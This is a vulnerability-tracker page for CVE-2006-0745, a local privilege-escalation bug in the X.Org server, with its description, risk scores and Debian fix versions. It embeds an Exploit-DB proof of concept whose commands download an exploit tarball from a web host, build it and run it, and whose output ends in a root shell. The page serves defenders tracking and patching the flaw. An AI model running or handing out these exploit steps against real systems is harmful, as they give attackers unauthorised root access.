CVE-2006-0745

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

X.Org server (xorg-server) 1.0.0 and later, X11R6.9.0, and X11R7.0 inadvertently treats the address of the geteuid function as if it is the return value of a call to geteuid, which allows local users to bypass intended restrictions and (1) execute arbitrary code via the -modulepath command line option or (2) overwrite arbitrary files via -logfile.

Predictions

Exploit likelihood

55%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-1596 local linux verified text · 1 KB

H D Moore · 2006-03-20

X.Org X11 (X11R6.9.0/X11R7.0) - Local Privilege Escalation

text exploit Source: Exploit-DB

# From Daniel Stone's Advisory
# xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates
# of X11R7.0, is vulnerable.
# X11R6.9.0, and all release candidates, are vulnerable.
# X11R6.8.2 and earlier versions are not vulnerable. 

# The rest is H D Moore from metasploit

Two second exploit, but if anyone is lazy:

$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath
$ ./root.sh
/bin/rm -f   exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c

X Window System Version 7.0.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 7.0
[ snip ]
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...

# backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1596.tgz (xmodulepath.tgz)

# milw0rm.com [2006-03-20]

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`1:1.0.2-1`
sid	Fixed	`1:1.0.2-1`
forky	Fixed	`1:1.0.2-1`
bullseye	Fixed	`1:1.0.2-1`
bookworm	Fixed	`1:1.0.2-1`

References

https://security-tracker.debian.org/tracker/CVE-2006-0745

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.